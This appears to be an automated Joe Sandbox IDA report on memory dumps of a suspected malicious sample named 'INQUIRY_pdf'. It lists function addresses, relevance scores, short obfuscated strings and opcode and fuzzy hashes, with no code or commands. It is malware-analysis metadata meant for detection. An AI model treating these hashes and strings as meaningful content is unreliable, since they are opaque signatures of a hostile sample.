Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: (ofq$(ofq$,jq$,jq
API String ID: 0-1018418033
Opcode ID: 400a85bd15384dc2a7e68df0f7876503f758fa2171542af1b93492624ff7ede9
Instruction ID: 5dbf3c6c066a86db10c4118e6327bc99fb7fabfb64cd714d624b4efa9601de00
Opcode Fuzzy Hash: 400a85bd15384dc2a7e68df0f7876503f758fa2171542af1b93492624ff7ede9
Instruction Fuzzy Hash: 93026030A04209DFCB55DF68C884AADBBF2FF44310F6580A9E985AB269DB35DD41CF51

Function 010869A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON

Download Yara Rule

Strings

Hjq, xrefs: 01086DA6
(ofq, xrefs: 01086EDA

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: (ofq$Hjq
API String ID: 0-2051923243
Opcode ID: 060c6cb6eaa6b08cc69c2bd7ef73d7a2344417d97d43c59521b58f7e145d68d6
Instruction ID: d9735b97c68a09477f67dfb8298f8e5f7a90079384cd986b177b509e3e4a3c8b
Opcode Fuzzy Hash: 060c6cb6eaa6b08cc69c2bd7ef73d7a2344417d97d43c59521b58f7e145d68d6
Instruction Fuzzy Hash: 1012AF70A002198FCB55EFA9C854BAEBBF6FF88300F118169E5859B395DF319D81CB90

Function 0108C146 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0108C400
PHfq, xrefs: 0108C3EF

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: PHfq$PHfq
API String ID: 0-3546021038
Opcode ID: 7632ed74859211f2439486ae85ac19d2c3ea5bfbe87ee7de5a0fda9d90f23016
Instruction ID: 784e6b04b4e003ffe0528cee281323480595981855cdbbf21315f86cbe8e1df4
Opcode Fuzzy Hash: 7632ed74859211f2439486ae85ac19d2c3ea5bfbe87ee7de5a0fda9d90f23016
Instruction Fuzzy Hash: 7DA1D874E04218CFEB54DFA9D984A9DBBF2BF89310F148069E599AB361DB309941CF60

Function 01085362 Relevance: 2.7, Strings: 2, Instructions: 197COMMON

Download Yara Rule

Strings

PHfq, xrefs: 010855C8
PHfq, xrefs: 010855D9

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: PHfq$PHfq
API String ID: 0-3546021038
Opcode ID: aaf376ebed66db25128c7ab3c91142154b2d292b2dd357c4ee65d0182243390e
Instruction ID: 91c6ea802b73b9105584f08a488a0d7ce029734da3a7b198b389728771c2fd91
Opcode Fuzzy Hash: aaf376ebed66db25128c7ab3c91142154b2d292b2dd357c4ee65d0182243390e
Instruction Fuzzy Hash: 4991F474E04218CFDB54DFA9D894A9DBFF2BF89300F1490A9E449AB361DB309985CF20

Function 0108CA08 Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0108CC5F
PHfq, xrefs: 0108CC70

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: PHfq$PHfq
API String ID: 0-3546021038
Opcode ID: ac913df162130c099cde81320d050820133ac736c065fd4e3a9e9fa41cb116e1
Instruction ID: 784c006a736cdac05e79bcd1fcc047c0713a7861c5c099c13ceef93920e4284b
Opcode Fuzzy Hash: ac913df162130c099cde81320d050820133ac736c065fd4e3a9e9fa41cb116e1
Instruction Fuzzy Hash: 3481E774E04608CFEB54DFAAD944A9DBBF2BF89300F10C069E458AB365DB305941DF60

Function 0108D278 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0108D4CF
PHfq, xrefs: 0108D4E0

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: PHfq$PHfq
API String ID: 0-3546021038
Opcode ID: 952dd6c43e5bb8e027f83650ce8f559cb33a73a132396c8b007871332f97337b
Instruction ID: 98950d8c47b627abca397a5f6ad2052b58282dab5b03525ffd3a1c463303bb46
Opcode Fuzzy Hash: 952dd6c43e5bb8e027f83650ce8f559cb33a73a132396c8b007871332f97337b
Instruction Fuzzy Hash: B881B274E04218CFDB54DFAAD884A9DBBF2BF89300F14D169E859AB365DB309981CF50

Function 0108C468 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0108C6BF
PHfq, xrefs: 0108C6D0

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: PHfq$PHfq
API String ID: 0-3546021038
Opcode ID: 8262adbbacdf301b3a072d0407b1992b1cd7ee558e3f6f762fa40443586ae0cd
Instruction ID: 70304fb8f73b233adb9281bbb3059081033af3a447974e016c2cbd2c29f67bf4
Opcode Fuzzy Hash: 8262adbbacdf301b3a072d0407b1992b1cd7ee558e3f6f762fa40443586ae0cd
Instruction Fuzzy Hash: 9A81E774E04218CFEB54DFA9D944A9DBBF2BF89300F14D069E459AB365DB309981CF20

Function 0108CCD8 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0108CF2F
PHfq, xrefs: 0108CF40

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: PHfq$PHfq
API String ID: 0-3546021038
Opcode ID: e6e5b835f9300cdcc56d5dbd1fc1b85014f67a834d022b0166e34693b5773950
Instruction ID: a5bbacc3b35720cd1aefc6d67bf6228ac0f8a8fc470e6772c1adf0fe0a9c355d
Opcode Fuzzy Hash: e6e5b835f9300cdcc56d5dbd1fc1b85014f67a834d022b0166e34693b5773950
Instruction Fuzzy Hash: 7D81B674E04218CFEB54DFAAD984A9DBBF2BF89300F14D069E459AB365DB305981CF60

Function 0108C738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0108C9A0
PHfq, xrefs: 0108C98F

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: PHfq$PHfq
API String ID: 0-3546021038
Opcode ID: 0591e654a0fc2d18d8b6f28860ef266addf98947a6d183824a57c24b681aba9d
Instruction ID: 6130beb5b5dcfeb217f18fc95d1551c04b81440e0da3f8f4ddd96f449601d6b5
Opcode Fuzzy Hash: 0591e654a0fc2d18d8b6f28860ef266addf98947a6d183824a57c24b681aba9d
Instruction Fuzzy Hash: CB81E774E04218CFEB54DFAAD944A9DBBF2BF89310F10C069E499AB365DB309941CF60

Function 0108CFAA Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PHfq, xrefs: 0108D1FF
PHfq, xrefs: 0108D210

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: PHfq$PHfq
API String ID: 0-3546021038
Opcode ID: 087b48ffda0d6530c5b89a63c176605a83ffe399c88c11e3ec566435897c053b
Instruction ID: 7c74d8b4aff3170a34c2679b9ef6d5d02ee7c68bbc8b3496b536a89158534b69
Opcode Fuzzy Hash: 087b48ffda0d6530c5b89a63c176605a83ffe399c88c11e3ec566435897c053b
Instruction Fuzzy Hash: 5281D374E04218DFDB54DFAAD884A9DBBF2BF89310F14D169E449AB365DB309981CF10

Function 0108E97A Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2846df30ab672dfa89c4529f21c557b18bc6ad73e14cc83922101fda1671a0e
Instruction ID: f62faa3b64a476aeb448e706a699f275dc3adefd49e2db5fc299786a5d375695
Opcode Fuzzy Hash: e2846df30ab672dfa89c4529f21c557b18bc6ad73e14cc83922101fda1671a0e
Instruction Fuzzy Hash: 22519774E04208DFDB18DFAAD984A9DBBB2FF89310F24D029E955AB364DB355842CF14

Function 0108E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 919ff548ba807cacf737ebe567a9fda611f1918daef17e27453cb88f82ae9614
Instruction ID: 3514d6bb8147b752b908a18275bef9e48f5a7f36bf8e397fb5284a6461254924
Opcode Fuzzy Hash: 919ff548ba807cacf737ebe567a9fda611f1918daef17e27453cb88f82ae9614
Instruction Fuzzy Hash: 42519374E04208DFDB18DFEAD984A9DBBB2FF89300F24902AE955AB364DB305941CF14

Function 010876F1 Relevance: 10.5, Strings: 8, Instructions: 475COMMON

Download Yara Rule

Strings

,jq, xrefs: 01087BA0
(ofq, xrefs: 01087815
,jq, xrefs: 01087B90
(ofq, xrefs: 010878B2
(ofq, xrefs: 01087BFF
(ofq, xrefs: 01087C0F
(ofq, xrefs: 010877E9
(ofq, xrefs: 0108772E

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: (ofq$(ofq$(ofq$(ofq$(ofq$(ofq$,jq$,jq
API String ID: 0-3756152659
Opcode ID: bb6b23329fb8dea4ea0218521fbf63defc9d5efd872b4b82dda478708f2bc999
Instruction ID: cb0987d13f707f908fb22f72b7f75fee69e9a40eab9f49945b0f98321f38f548
Opcode Fuzzy Hash: bb6b23329fb8dea4ea0218521fbf63defc9d5efd872b4b82dda478708f2bc999
Instruction Fuzzy Hash: 52126A30A04209DFCB55EF68C884A9EBBF2FF89314F248599E5859B365DB30ED41CB50

Function 01085F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

Hjq, xrefs: 01086056
Hjq, xrefs: 01086023

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: Hjq$Hjq
API String ID: 0-2395847853
Opcode ID: ecb07c3a7bb1a1c17af74c4398da12c422d262aa6a341c3ef76732f9f13262dc
Instruction ID: 810ecd0d6216dcb910dda5a6a70875d39daca6f8c713c7aa9cc6df5b8d904d76
Opcode Fuzzy Hash: ecb07c3a7bb1a1c17af74c4398da12c422d262aa6a341c3ef76732f9f13262dc
Instruction Fuzzy Hash: 359193303082548FDB56AF68C854A6F7BE2BF89300F158469E5C68B396DF36CC42CB91

Function 01086498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,jq, xrefs: 01086578
,jq, xrefs: 0108656E

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: ,jq$,jq
API String ID: 0-3554820393
Opcode ID: cefb2157badab2650d27a04d7fbc0520dae0505c21b35c40c6aaa36085e79ae6
Instruction ID: 75acbf62800f57d92199b6a146c749984901f708a5c1965f8fa3203e282d2235
Opcode Fuzzy Hash: cefb2157badab2650d27a04d7fbc0520dae0505c21b35c40c6aaa36085e79ae6
Instruction Fuzzy Hash: 0581A030A08505CFCB54EF6CC48496EBBF2BF89314B1681A9D5C5DB3A5DB32E851CBA0

Function 0108AEBA Relevance: 2.6, Strings: 2, Instructions: 122COMMON

Download Yara Rule

Strings

(ofq, xrefs: 0108AECD
(ofq, xrefs: 0108B079

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: (ofq$(ofq
API String ID: 0-4162465338
Opcode ID: 699b550a006e9c2e7f5b8b4c0080abb9291c55e97c60cee45815529c0c0bfd9b
Instruction ID: cd8adc70dc751d2203175b977dd0bfb0d12c586d3ffe00ad6664a830398c3ab7
Opcode Fuzzy Hash: 699b550a006e9c2e7f5b8b4c0080abb9291c55e97c60cee45815529c0c0bfd9b
Instruction Fuzzy Hash: FB41D6317042049FC755ABB8D8146AE7FF6AFC9310F1444AAE586DB3D2DE369C02CBA0

Function 01083CB1 Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

Xjq, xrefs: 01083CF6
Xjq, xrefs: 01083CCD

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: Xjq$Xjq
API String ID: 0-958142700
Opcode ID: 6783863467a30592c2cf88881f31ab4b6efece45c0505317a43b2f9f0f347d59
Instruction ID: b7299d633009545364c2678d217087f201255e58a2d8d8d35032e43220743997
Opcode Fuzzy Hash: 6783863467a30592c2cf88881f31ab4b6efece45c0505317a43b2f9f0f347d59
Instruction Fuzzy Hash: 8B31E5317083654BDF597A6DA8A427EBAE6BBC5600F18447AD9C2CB381DFB4CC058761

Function 01088EF8 Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

$fq, xrefs: 01088FD7
$fq, xrefs: 01088FB4

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: $fq$$fq
API String ID: 0-2537786760
Opcode ID: 9d18d964885eff202e275b0ca4ba58757039d3d92fb6db8885536bd92cb604a4
Instruction ID: 8a2b95c755839f18276eb688b67a457cab03a5469172d11bc7f01792a58f38ae
Opcode Fuzzy Hash: 9d18d964885eff202e275b0ca4ba58757039d3d92fb6db8885536bd92cb604a4
Instruction Fuzzy Hash: A731E63030C2518FDB76AB2CC89457E7BA7BB8471075584ABF2C2CB293EE29DC408751

Function 01089D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4'fq, xrefs: 01089D84
4'fq, xrefs: 01089D6D

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: 4'fq$4'fq
API String ID: 0-751858264
Opcode ID: d4c34e7cf9b2e8fb3fd45fdef812127271cf91bd48402b21d3c1523fd4664fef
Instruction ID: e32d2907df336f1af58a5d03eca243a6ef1ea58f0fc88c13d20e0b162ddf6d5f
Opcode Fuzzy Hash: d4c34e7cf9b2e8fb3fd45fdef812127271cf91bd48402b21d3c1523fd4664fef
Instruction Fuzzy Hash: F1F0A9353002056FD7083EA9985097F7EDBEBCC364B048429BA8AC7350DE66CC019391

Function 01080C8F Relevance: 1.8, Strings: 1, Instructions: 546COMMON

Download Yara Rule

Strings

LRfq, xrefs: 01080F19

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: LRfq
API String ID: 0-2333822924
Opcode ID: c47e432b6579eacc91793ede69b5bdbb942375aef1f0de37b4e940c560e94ca3
Instruction ID: 7486d8ce988582e07a46b418ae738e2449eb5639f31d59ec3e952ce6af8a9689
Opcode Fuzzy Hash: c47e432b6579eacc91793ede69b5bdbb942375aef1f0de37b4e940c560e94ca3
Instruction Fuzzy Hash: D452EB74A00619CFCB54EF68ED84B9DBBB2FB48301F1086A9E449A7358DB345E86CF51

Function 01080CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRfq, xrefs: 01080F19

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID: LRfq
API String ID: 0-2333822924
Opcode ID: c16b3530b5824092dc32642b9ae4023c47fe0011c7311b3c06e77ca8184cdba6
Instruction ID: 0c90866700998b16cd5ff6822e01d01faf08faa6e382250e86c1470f567121e8
Opcode Fuzzy Hash: c16b3530b5824092dc32642b9ae4023c47fe0011c7311b3c06e77ca8184cdba6
Instruction Fuzzy Hash: 9752ED74A00619CFCB54EF68ED84B9DBBB2FB48301F1086A9E409A7358DB345E86CF51

Function 0108E007 Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649a07c442d816bb0bc9960b411710cfb964c8412a9e6cfcce59394c5ed531da
Instruction ID: 061916f0349554026a304b0a359b94a97b8c939cefa5796511e33019a9e1da5e
Opcode Fuzzy Hash: 649a07c442d816bb0bc9960b411710cfb964c8412a9e6cfcce59394c5ed531da
Instruction Fuzzy Hash: 4512A635061B43CFD2606B30F6BC16EBA64FB1F363384AD10F18BC5459EB7A14898B62

Function 0108E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b615b247b31d7b8ccf21c0c074b7674c239a22fd74d3f26558f8dddb3265d5d7
Instruction ID: 903d630170abd7a333de67a4ef29e5debe296d85cb8347ff80956fe37fa5dc63
Opcode Fuzzy Hash: b615b247b31d7b8ccf21c0c074b7674c239a22fd74d3f26558f8dddb3265d5d7
Instruction Fuzzy Hash: EE129735061B43CF92606B30F6BC16EBA65FB1F363384AD10B18FC5459EB7A14898B66

Function 010880D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82ff1c0969451f1f3eaa7bd7a3c1df91de3907634216e3b67dda8f5969e11e5
Instruction ID: a0a825d7c4e2edc2d22e0bb243d464f37a4b3cfe81f85539cab3fffa830ba9c3
Opcode Fuzzy Hash: d82ff1c0969451f1f3eaa7bd7a3c1df91de3907634216e3b67dda8f5969e11e5
Instruction Fuzzy Hash: 35715B34304A098FDB65EF6CC884AAE7BE5AF89300F5580AAE995DB371DB71DC41CB50

Function 0108F3F1 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0328f810c2507526bd4a6141e9a988d6b3c7eaaff8c3bf08f259c2917bb2bb1f
Instruction ID: 335d64c8fcbe04d04372d4304605284d7d6f3f62961613ad87afb21d6290c3c6
Opcode Fuzzy Hash: 0328f810c2507526bd4a6141e9a988d6b3c7eaaff8c3bf08f259c2917bb2bb1f
Instruction Fuzzy Hash: C0611174D00219CFDB14DFF5D984AAEBBB2FF89300F608129E945AB2A4DB355986CF40

Function 0108D548 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee11b6820d01c1474e4689e56e5e97d52bdcda46c2a1692f03b3f2e042de9b70
Instruction ID: dfe6c5687449b4407feb8a2e6111bedd09a4012e4e8502c2c2c0ab4cb6ff1528
Opcode Fuzzy Hash: ee11b6820d01c1474e4689e56e5e97d52bdcda46c2a1692f03b3f2e042de9b70
Instruction Fuzzy Hash: 5F518474E01208DFDB54DFA9D584A9DBBF2FF89300F208169E819AB365DB319905CF50

Function 010841A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4dbd60bf7c7b605135898f9ff94f1ab8e1691c27e153c874b191ae1c733314a
Instruction ID: 5856dc90f0a602406816378ac02f877bc8a1c22fa6f5d72561ea4d9876fc0dfb
Opcode Fuzzy Hash: f4dbd60bf7c7b605135898f9ff94f1ab8e1691c27e153c874b191ae1c733314a
Instruction Fuzzy Hash: 05519674E01308CFCB48DFA9D99499DBBF2FF89300B209469E815AB364DB35A942CF50

Function 0108A303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686f74b9b89405d0c97cdb87508ae9b14e9724a8fe7c41c7c0fe062a94c0db98
Instruction ID: fa7c1bfc54722291b7c5354cb4ea549f30ae2ec69dbdefdc1b3885ec4b94c397
Opcode Fuzzy Hash: 686f74b9b89405d0c97cdb87508ae9b14e9724a8fe7c41c7c0fe062a94c0db98
Instruction Fuzzy Hash: F141AE31B08249DFCF16DFA8C844A9DBFF2AF85320F048196E9C59B692D775E914CB50

Function 01089C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7617627ea9499b29969c2740e23aac74f6d6c219d832b366f4c3ac8a8514ccd
Instruction ID: eff462f7c102326ce8c74c4fcd6931bcbd800fd1cb12fdeaf2fb4714fbd26fff
Opcode Fuzzy Hash: b7617627ea9499b29969c2740e23aac74f6d6c219d832b366f4c3ac8a8514ccd
Instruction Fuzzy Hash: D94169306083448FDB01EF68C844B6A7BE6AB89308F4484A6E988CB256E735DC41DB62

Function 01085658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181fa7492a54ce238ace7a5a56438c66152b85c47d1a2c0e41e4dea8bf894a9d
Instruction ID: 3a96628cd7c79cb9fe4888c99a6762b5d5ed18c2815b14e273267725202e352c
Opcode Fuzzy Hash: 181fa7492a54ce238ace7a5a56438c66152b85c47d1a2c0e41e4dea8bf894a9d
Instruction Fuzzy Hash: B5319331304109EFCF55AFA8E854A6F7FA2FF48301F408065F99687255CB75DA61DBA0

Function 01082790 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffbb4e59aa6dd5f89d9d466ae030aca7dee701299abde99e89dfea80380c3bf5
Instruction ID: 9a6974b1dec3a23b352564b88b7571329ec4e609e3308079161ac264e73ff860
Opcode Fuzzy Hash: ffbb4e59aa6dd5f89d9d466ae030aca7dee701299abde99e89dfea80380c3bf5
Instruction Fuzzy Hash: 7B316B70D09209CFCB05EFA9D9445EDBFF4FF4A300F0045AAD444A7264EB355981CBA2

Function 01088380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1af8cedfb2c2fba4a005bb5f7149234b4b1014c59a265f4021541a52f65bc64e
Instruction ID: 7e981b9860e7a268bf5d711ea4d20447b18b18bdd39bd3cea33da9bb3ffad931
Opcode Fuzzy Hash: 1af8cedfb2c2fba4a005bb5f7149234b4b1014c59a265f4021541a52f65bc64e
Instruction Fuzzy Hash: 4D21C1323081054BEB65762D845473E3696AFC4708FA4D07ED5C6CB39AEE66CC429381

Function 010828F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4161431090.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1080000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f09579a3a54c380ad8e1645158a734b93ebb8fff9c8c2d58178fd9d5157b845
Instruction ID: 2d23b7f558e3fd09859c44546b962387fcfb26f88a65873544bb11fad55d2fdf
Opcode Fuzzy Hash: 9f09579a3a54c380ad8e1645158a734b93ebb8fff9c8c2d58178fd9d5157b845
Instruction Fuzzy Hash: 6921A435A001159FCB55EF28D940AAEB7A5EB9D3A0B50C459E8899B354DB30EA42CBD0

Function 00DAD554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160662363.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_dad000_INQUIRY_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19d5094bb115e45d63c14aa061b574abdda4026d495f3d0aa1f4b844b440fcdb
Instruction ID: 90f7d8f26356f4a78a5bf3f80e2e8b2125795301c548a120d9b787d20eafde80
Opcode Fuzzy Hash: 19d5094bb115e45d63c14aa061b574abdda4026d495f3d0aa1f4b844b440fcdb
Instruction Fuzzy Hash: E7216AB1904244DFCB04DF14D9C0F26BF66FB89314F28C569E84A0B656C336D816DBB1

Function 00DBD005 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4160707734.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false

Joe Sandbox IDA Plugin

